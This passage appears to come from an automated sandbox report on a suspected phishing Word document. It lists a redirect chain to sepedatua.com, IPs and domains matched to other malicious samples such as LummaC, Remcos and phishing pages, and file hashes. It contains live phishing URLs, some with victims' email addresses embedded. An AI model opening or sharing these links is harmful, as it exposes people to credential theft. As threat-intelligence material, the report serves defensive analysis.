                                                                          • Excluded domains from analysis (whitelisted): fp.msedge.net, e1324.dscd.akamaiedge.net, slscr.update.microsoft.com, na.privatelink.msidentity.com, weu-azsc-000.roaming.officeapps.live.com, clientservices.googleapis.com, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, a1847.dscg2.akamai.net, clients2.google.com, ocsp.digicert.com, login.live.com, e16604.g.akamaiedge.net, update.googleapis.com, officeclient.microsoft.com, wu-b-net.trafficmanager.net, www.bing.com, ecs.office.com, www.ppev6tm.aadg.akadns.net, fs.microsoft.com, content-autofill.googleapis.com, aadcdnoriginwus2.azureedge.net, www.tm.f.prd.aadg.akadns.net, uci.cdn.office.net, aadcdn.msauth.net, prod.roaming1.live.com.akadns.net, s-0005-office.config.skype.com, nleditor.osi.office.net, edgedl.me.gvt1.com, s-0005.s-msedge.net, aadcdnoriginwus2.afd.azureedge.net, metadata.templates.cdn.office.net, ecs.office.trafficmanager.net, clients.l.google.com, ppe.v6.aadg.privatelink.msidentity.com, europe.configsvc1.live.com.akadns.net, binaries.
                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                          • Report size getting too big, too many NtCreateFile calls found.
                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtQueryAttributesFile calls found.
                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                          • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                          • VT rate limit hit for: NoteID [4962398] _Secure_Document_Mrettinger-46568.docx
                                                                          No simulations
                                                                          SourceURL
                                                                          Screenshothttps://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Mrettinger+dcndx.com
                                                                          Screenshothttps://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Mrettinger+dcndx.com
                                                                          Screenshothttps://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Mrettinger+dcndx.com
                                                                          Screenshothttps://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Mrettinger+dcndx.com
                                                                          Screenshothttps://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Mrettinger+dcndx.com
                                                                          Screenshothttps://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Mrettinger+dcndx.com
                                                                          Screenshothttps://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Mrettinger+dcndx.com
                                                                          Screenshothttps://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Mrettinger+dcndx.com
                                                                          Screenshothttps://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Mrettinger+dcndx.com
                                                                          Screenshothttps://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Mrettinger+dcndx.com
                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                          154.216.17.193#U051d==.emlGet hashmaliciousUnknownBrowse
                                                                            Annual_Benefits_&_Bonus_for_Lorne.zuck#IyNURVhUTlVNUkFORE9NNDUjIw==.docxGet hashmaliciousUnknownBrowse
                                                                              Benefits_&_Bonus_for_Dan.banks#IyNURVhUTlVNUkFORE9NNDUjIw==.docxGet hashmaliciousUnknownBrowse
                                                                                https://tenereteam.digidip.net/visit?url=https%3A%2F%2Fzp73eW7jfL3crnrfCoQ60D1yS.adpk.com.br/xQwrPPjghfe/viWyugvQwer/bvdfreGhjik/saQriuhbT/SWn28u/ZnVjay55b3VAd2hhdGV2ZXIuY29tGet hashmaliciousUnknownBrowse
                                                                                  doc_Agilitas_9769667025.htmlGet hashmaliciousPhisherBrowse
                                                                                    13.107.246.44file.exeGet hashmaliciousLummaCBrowse
                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                        file.exeGet hashmaliciousLummaCBrowse
                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                              file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                file.exeGet hashmaliciousLummaCBrowse
                                                                                                  file.exeGet hashmaliciousLummaCBrowse
                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                      https://stopify.co/BOAZ81Get hashmaliciousUnknownBrowse
                                                                                                        104.18.94.41https://www.summerfetes.co.uk/directory/jump.php?id=http://myronivkanews.comGet hashmaliciousPhisherBrowse
                                                                                                          http://login.nojustgive.com/ueAQYUzzGet hashmaliciousHTMLPhisherBrowse
                                                                                                            Benefits_Update_2024.pdfGet hashmaliciousUnknownBrowse
                                                                                                              Benefits_Update_2024.pdfGet hashmaliciousUnknownBrowse
                                                                                                                https://jammyjetscorp.uk/PurchaseLedgerRemittanceAdvice/PDFGet hashmaliciousUnknownBrowse
                                                                                                                  https://www.google.es/url?q=queryri4m(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fmediamei.com.br%2fdada%2funcz66ahtgqg1jqqmvsnfzkcw2oylxhqc48ee/YW5pbWFsaWFAYW5pbWFsaWEubm8=$?Get hashmaliciousUnknownBrowse
                                                                                                                    https://www.google.ki/url?Obdy=o1RbVZ9nKE3ZhJRHbKGv&cgsr=bnJtdqeStbk73BcMC6fs&sa=t&wofc=4hzzg6rsjrHHZ2kN1m3A&url=amp%2Fplimmerton.org.nz%2Fjugz%2F#oetqVE-SUREDANNSmFtaWUuQmVsbEBlbGthbWV0LmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                      Ssc Executed Docs#962297(Revised).docxGet hashmaliciousUnknownBrowse
                                                                                                                        https://deliversystand.com/Get hashmaliciousUnknownBrowse
                                                                                                                          https://deliversystand.com/Get hashmaliciousUnknownBrowse
                                                                                                                            13.107.246.60https://protect-us.mimecast.com/s/wFHoCqxrAnt7V914iZaD1vGet hashmaliciousUnknownBrowse
                                                                                                                            • www.mimecast.com/Customers/Support/Contact-support/
                                                                                                                            http://wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5Get hashmaliciousUnknownBrowse
                                                                                                                            • wellsfargo.dealogic.com/clientportal/Conferences/Registration/Form/368?menuItemId=5
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            s-part-0016.t-0009.t-msedge.netfile.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 13.107.246.44
                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 13.107.246.44
                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 13.107.246.44
                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 13.107.246.44
                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                            • 13.107.246.44
                                                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                            • 13.107.246.44
                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 13.107.246.44
                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 13.107.246.44
                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 13.107.246.44
                                                                                                                            https://stopify.co/BOAZ81Get hashmaliciousUnknownBrowse
                                                                                                                            • 13.107.246.44
                                                                                                                            sepedatua.comphish_alert_iocp_v1.4.48 (68).emlGet hashmaliciousUnknownBrowse
                                                                                                                            • 103.134.152.12
                                                                                                                            http://samobile.net/content/offsite_article.html?url=https%3A%2F%2Fsepedatua.com%2F158983%2Fsecure-redirect%23cnichols%2Bderickdermatology.com&headline=New+Jerusalem%2C+The+by+Chesterton%2C+G.+KGet hashmaliciousCaptcha PhishBrowse
                                                                                                                            • 103.134.152.12
                                                                                                                            Pmendon.ext_Reord_Adjustment.docxGet hashmaliciousCaptcha PhishBrowse
                                                                                                                            • 103.134.152.12
                                                                                                                            https://insidesales-email.com:443/l/1/17014050/Y/useast1-a-2021.09.07-11929645/1/ab/Dyn0a6AiyEfbGyJK116Prl6kZkPYRyBwA4ljCxkDy74?lnk=https://sepedatua.com/zfr681#elam+exeterfinance.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 103.134.152.12
                                                                                                                            bc1qv5p8dwc98n3judrczkmpkjz.com#U051d==.emlGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            Annual_Benefits_&_Bonus_for_Lorne.zuck#IyNURVhUTlVNUkFORE9NNDUjIw==.docxGet hashmaliciousUnknownBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            r.neurotags.netPmendon.ext_Reord_Adjustment.docxGet hashmaliciousCaptcha PhishBrowse
                                                                                                                            • 34.168.114.70
                                                                                                                            cdnjs.cloudflare.comhttps://www.summerfetes.co.uk/directory/jump.php?id=http://myronivkanews.comGet hashmaliciousPhisherBrowse
                                                                                                                            • 104.17.25.14
                                                                                                                            https://pzpvsr8w.r.us-west-2.awstrack.me/L0/https:%2F%2Flmmoya.online%2Fcave.html/1/010101933f26e1e0-1115fe0b-5025-44be-8af4-15d6df5c778e-000000/HfxdUzBUygbU0CHkcLEJKW7Wybk=401Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                            • 104.17.25.14
                                                                                                                            https://drive.google.com/uc?export=download&id=1YBKJhy1GWwuEta_1b7KX-jKtXfpHDuuYGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 104.17.25.14
                                                                                                                            phish_alert_sp1_1.0.0.0(1).emlGet hashmaliciousKnowBe4Browse
                                                                                                                            • 104.17.24.14
                                                                                                                            https://shorturl.at/cQweaGet hashmaliciousUnknownBrowse
                                                                                                                            • 104.17.24.14
                                                                                                                            https://jammyjetscorp.uk/PurchaseLedgerRemittanceAdvice/PDFGet hashmaliciousUnknownBrowse
                                                                                                                            • 104.17.25.14
                                                                                                                            #U051d==.emlGet hashmaliciousUnknownBrowse
                                                                                                                            • 104.17.24.14
                                                                                                                            https://www.google.es/url?q=queryri4m(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3Dquery(spellCorrectionEnabled%3Atrue%2CrecentSearchParam%3A(id%3A3891228890%2CdoLogHistory%3Atrue)%2Cfilters%3AList((type%3AREGION%2Cvalues%3AList((id%3A103644278%2Ctext%3AUnited%2520States%2CselectionType%3AINCLUDED))))%2Ckeywords%3Aremote)&sessionId=5NTcRf4wT3OOZdAOuNu6%2FQ%3D%3D&sa=t&url=amp%2fmediamei.com.br%2fdada%2funcz66ahtgqg1jqqmvsnfzkcw2oylxhqc48ee/YW5pbWFsaWFAYW5pbWFsaWEubm8=$?Get hashmaliciousUnknownBrowse
                                                                                                                            • 104.17.24.14
                                                                                                                            https://ow.ly/ok9750U8Nry#jeanette.marais@mmltd.co.zaGet hashmaliciousOutlook Phishing, HTMLPhisherBrowse
                                                                                                                            • 104.17.25.14
                                                                                                                            https://www.google.ki/url?Obdy=o1RbVZ9nKE3ZhJRHbKGv&cgsr=bnJtdqeStbk73BcMC6fs&sa=t&wofc=4hzzg6rsjrHHZ2kN1m3A&url=amp%2Fplimmerton.org.nz%2Fjugz%2F#oetqVE-SUREDANNSmFtaWUuQmVsbEBlbGthbWV0LmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                            • 104.17.24.14
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            MICROSOFT-CORP-MSN-AS-BLOCKUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                            • 94.245.104.56
                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 13.107.246.44
                                                                                                                            seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                            • 94.245.104.56
                                                                                                                            FRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 94.245.104.56
                                                                                                                            https://www.figma.com/files/team/1440352672505295724/recents-and-sharing?fuid=1440352668792061854Get hashmaliciousUnknownBrowse
                                                                                                                            • 150.171.27.10
                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 13.107.246.45
                                                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                            • 94.245.104.56
                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 13.107.246.45
                                                                                                                            https://pzpvsr8w.r.us-west-2.awstrack.me/L0/https:%2F%2Flmmoya.online%2Fcave.html/1/010101933f26e1e0-1115fe0b-5025-44be-8af4-15d6df5c778e-000000/HfxdUzBUygbU0CHkcLEJKW7Wybk=401Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                            • 13.107.246.45
                                                                                                                            phish_alert_sp1_1.0.0.0.emlGet hashmaliciousUnknownBrowse
                                                                                                                            • 13.89.178.27
                                                                                                                            SKHT-ASShenzhenKatherineHengTechnologyInformationConew.batGet hashmaliciousUnknownBrowse
                                                                                                                            • 154.216.17.175
                                                                                                                            ungziped_file.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 154.216.20.185
                                                                                                                            iwir64.elfGet hashmaliciousMiraiBrowse
                                                                                                                            • 154.216.16.109
                                                                                                                            #U051d==.emlGet hashmaliciousUnknownBrowse
                                                                                                                            • 154.216.17.193
                                                                                                                            Annual_Benefits_&_Bonus_for_Lorne.zuck#IyNURVhUTlVNUkFORE9NNDUjIw==.docxGet hashmaliciousUnknownBrowse
                                                                                                                            • 154.216.17.193
                                                                                                                            driver1.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 154.216.19.63
                                                                                                                            driver1.exeGet hashmaliciousUnknownBrowse
                                                                                                                            • 154.216.19.63
                                                                                                                            new.batGet hashmaliciousUnknownBrowse
                                                                                                                            • 154.216.17.175
                                                                                                                            Benefits_&_Bonus_for_Dan.banks#IyNURVhUTlVNUkFORE9NNDUjIw==.docxGet hashmaliciousUnknownBrowse
                                                                                                                            • 154.216.17.193
                                                                                                                            file.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 154.216.20.185
                                                                                                                            MICROSOFT-CORP-MSN-AS-BLOCKUSfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                            • 94.245.104.56
                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 13.107.246.44
                                                                                                                            seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                            • 94.245.104.56
                                                                                                                            FRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 94.245.104.56
                                                                                                                            https://www.figma.com/files/team/1440352672505295724/recents-and-sharing?fuid=1440352668792061854Get hashmaliciousUnknownBrowse
                                                                                                                            • 150.171.27.10
                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 13.107.246.45
                                                                                                                            file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                            • 94.245.104.56
                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 13.107.246.45
                                                                                                                            https://pzpvsr8w.r.us-west-2.awstrack.me/L0/https:%2F%2Flmmoya.online%2Fcave.html/1/010101933f26e1e0-1115fe0b-5025-44be-8af4-15d6df5c778e-000000/HfxdUzBUygbU0CHkcLEJKW7Wybk=401Get hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                            • 13.107.246.45
                                                                                                                            phish_alert_sp1_1.0.0.0.emlGet hashmaliciousUnknownBrowse
                                                                                                                            • 13.89.178.27
                                                                                                                            CLOUDFLARENETUSDRP130636747.pdfGet hashmaliciousUnknownBrowse
                                                                                                                            • 104.18.10.207
                                                                                                                            gP5rh6fa0S.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                                                            • 104.26.12.205
                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 188.114.96.3
                                                                                                                            https://t.co/D4HGMmKLnLGet hashmaliciousUnknownBrowse
                                                                                                                            • 162.159.140.229
                                                                                                                            FRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 172.64.41.3
                                                                                                                            http://bit.ly/e0Mw9wGet hashmaliciousUnknownBrowse
                                                                                                                            • 172.67.154.157
                                                                                                                            z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 188.114.97.3
                                                                                                                            https://www.summerfetes.co.uk/directory/jump.php?id=http://myronivkanews.comGet hashmaliciousPhisherBrowse
                                                                                                                            • 104.16.123.96
                                                                                                                            https://acrobatsign.us.com/D5QtQ3EphanI1AQ3Ez01thoTxmaD5Q2AP4DCaI1AI1AchI1A-D5QankyoTxz01Q3EuGet hashmaliciousUnknownBrowse
                                                                                                                            • 172.67.189.14
                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                            28a2c9bd18a11de089ef85a160da29e4DRP130636747.pdfGet hashmaliciousUnknownBrowse
                                                                                                                            • 172.202.163.200
                                                                                                                            • 204.79.197.200
                                                                                                                            • 204.79.197.222
                                                                                                                            • 40.126.32.68
                                                                                                                            • 52.108.10.254
                                                                                                                            https://moonoafy.netGet hashmaliciousUnknownBrowse
                                                                                                                            • 172.202.163.200
                                                                                                                            • 204.79.197.200
                                                                                                                            • 204.79.197.222
                                                                                                                            • 40.126.32.68
                                                                                                                            • 52.108.10.254
                                                                                                                            file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                            • 172.202.163.200
                                                                                                                            • 204.79.197.200
                                                                                                                            • 204.79.197.222
                                                                                                                            • 40.126.32.68
                                                                                                                            • 52.108.10.254
                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 172.202.163.200
                                                                                                                            • 204.79.197.200
                                                                                                                            • 204.79.197.222
                                                                                                                            • 40.126.32.68
                                                                                                                            • 52.108.10.254
                                                                                                                            https://t.co/D4HGMmKLnLGet hashmaliciousUnknownBrowse
                                                                                                                            • 172.202.163.200
                                                                                                                            • 204.79.197.200
                                                                                                                            • 204.79.197.222
                                                                                                                            • 40.126.32.68
                                                                                                                            • 52.108.10.254
                                                                                                                            FRSSDE.exeGet hashmaliciousRemcosBrowse
                                                                                                                            • 172.202.163.200
                                                                                                                            • 204.79.197.200
                                                                                                                            • 204.79.197.222
                                                                                                                            • 40.126.32.68
                                                                                                                            • 52.108.10.254
                                                                                                                            http://bit.ly/e0Mw9wGet hashmaliciousUnknownBrowse
                                                                                                                            • 172.202.163.200
                                                                                                                            • 204.79.197.200
                                                                                                                            • 204.79.197.222
                                                                                                                            • 40.126.32.68
                                                                                                                            • 52.108.10.254
                                                                                                                            https://www.summerfetes.co.uk/directory/jump.php?id=http://myronivkanews.comGet hashmaliciousPhisherBrowse
                                                                                                                            • 172.202.163.200
                                                                                                                            • 204.79.197.200
                                                                                                                            • 204.79.197.222
                                                                                                                            • 40.126.32.68
                                                                                                                            • 52.108.10.254
                                                                                                                            https://acrobatsign.us.com/D5QtQ3EphanI1AQ3Ez01thoTxmaD5Q2AP4DCaI1AI1AchI1A-D5QankyoTxz01Q3EuGet hashmaliciousUnknownBrowse
                                                                                                                            • 172.202.163.200
                                                                                                                            • 204.79.197.200
                                                                                                                            • 204.79.197.222
                                                                                                                            • 40.126.32.68
                                                                                                                            • 52.108.10.254
                                                                                                                            https://www.figma.com/files/team/1440352672505295724/recents-and-sharing?fuid=1440352668792061854Get hashmaliciousUnknownBrowse
                                                                                                                            • 172.202.163.200
                                                                                                                            • 204.79.197.200
                                                                                                                            • 204.79.197.222
                                                                                                                            • 40.126.32.68
                                                                                                                            • 52.108.10.254
                                                                                                                            6271f898ce5be7dd52b0fc260d0662b3phish_alert_sp1_1.0.0.0(1).emlGet hashmaliciousKnowBe4Browse
                                                                                                                            • 2.23.209.179
                                                                                                                            REMITTANCE_Confrimationsslip54342Bqlaw.htmlGet hashmaliciousUnknownBrowse
                                                                                                                            • 2.23.209.179
                                                                                                                            Signert kontrakt og faktura.xlsGet hashmaliciousUnknownBrowse
                                                                                                                            • 2.23.209.179
                                                                                                                            New order.xlsGet hashmaliciousUnknownBrowse
                                                                                                                            • 2.23.209.179
                                                                                                                            purchase order (2).xlsGet hashmaliciousUnknownBrowse
                                                                                                                            • 2.23.209.179
                                                                                                                            file.exeGet hashmaliciousLummaCBrowse
                                                                                                                            • 2.23.209.179
                                                                                                                            ProtectedDoc.docxGet hashmaliciousKnowBe4Browse
                                                                                                                            • 2.23.209.179
                                                                                                                            Mark Qualman.zipGet hashmaliciousUnknownBrowse
                                                                                                                            • 2.23.209.179
                                                                                                                            https://www.zealxllc.com/sgvGet hashmaliciousUnknownBrowse
                                                                                                                            • 2.23.209.179
                                                                                                                            https://forms.office.com/Pages/ShareFormPage.aspx?id=xW69F1aTs06UvACEsnZeONWs3ov4-fZJk9ZDjpIIN5tUMUFMSUpJVVFUWEtHTFlURVNUWE1QV1hXQi4u&sharetoken=2Z2A4vYPJAA4bBGx5zDgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                            • 2.23.209.179
                                                                                                                            3b5074b1b5d032e5620f69f9f700ff0eDRP130636747.pdfGet hashmaliciousUnknownBrowse
                                                                                                                            • 13.107.5.88
                                                                                                                            seethebestthingswhichhappenedentiretimewithgreattimebacktohere.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                                                                                            • 13.107.5.88
                                                                                                                            z30ProofofPaymentAttached.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                            • 13.107.5.88
                                                                                                                            Order88983273293729387293828PDF.exeGet hashmaliciousQuasarBrowse
                                                                                                                            • 13.107.5.88
                                                                                                                            https://www.figma.com/files/team/1440352672505295724/recents-and-sharing?fuid=1440352668792061854Get hashmaliciousUnknownBrowse
                                                                                                                            • 13.107.5.88
                                                                                                                            https://www.google.co.th/url?q=sf_rand_string_uppercase(33)uQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%20xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2F%62%65%73%74%73%63%72%65%65%6E%69%6E%67%73%65%72%76%69%63%65%2E%63%6F%6D%2F%77%69%6E%6E%6D%2F%6B%6F%6C%69%6E%6E%2F%6B%6F%6F%6C%2Ftest@gmail.comGet hashmaliciousUnknownBrowse
                                                                                                                            • 13.107.5.88
                                                                                                                            https://www.google.com/url?sa=https://r20.rs6.net/tnt.jsp?f=t&rct=j&q=&esrc=s&source=web&cd=&cad=rja&uact=8&ved=2ahUKEwjU1vfA9siJAxVNh_0HHcggMUkQFnoECB0QAQ&url=amp/s/kovitz.net%2Fyvbw%2F9424537096/ZGViQG1hcnRpbmpveWNlLmNvbQ==Get hashmaliciousUnknownBrowse
                                                                                                                            • 13.107.5.88
                                                                                                                            Fac.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                            • 13.107.5.88
                                                                                                                            phish_alert_sp1_1.0.0.0(1).emlGet hashmaliciousKnowBe4Browse
                                                                                                                            • 13.107.5.88
                                                                                                                            voi.batGet hashmaliciousUnknownBrowse
                                                                                                                            • 13.107.5.88
                                                                                                                            No context
                                                                                                                            Process:C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE
                                                                                                                            File Type:data
                                                                                                                            Category:dropped
                                                                                                                            Size (bytes):338
                                                                                                                            Entropy (8bit):3.459804934679828
                                                                                                                            Encrypted:false
                                                                                                                            SSDEEP:6:kKpcW8oJFN+SkQlPlEGYRMY9z+s3Ql2DUevat:t4kPlE99SCQl2DUevat
                                                                                                                            MD5:EB916C2D7DC76806A6BF2687E50E6F0D
                                                                                                                            SHA1:75D39C1B04B85828A086D9E332BD06014574BADD
                                                                                                                            SHA-256:DEBCB30475A95EC3B3C27EA695338C7EF90DB2A64F9226D112F69B2D8BC4AEDD
                                                                                                                            SHA-512:4AD6DCAAA2F7D63250E49C9F8E0AD72D55FAAD186A3AB1FD5B99BF15A0915EAFF904B7C0501DC062999B9682C94D4BA59341679D036517D0847452BA458B5A82
                                                                                                                            Malicious:false
                                                                                                                            Reputation:low
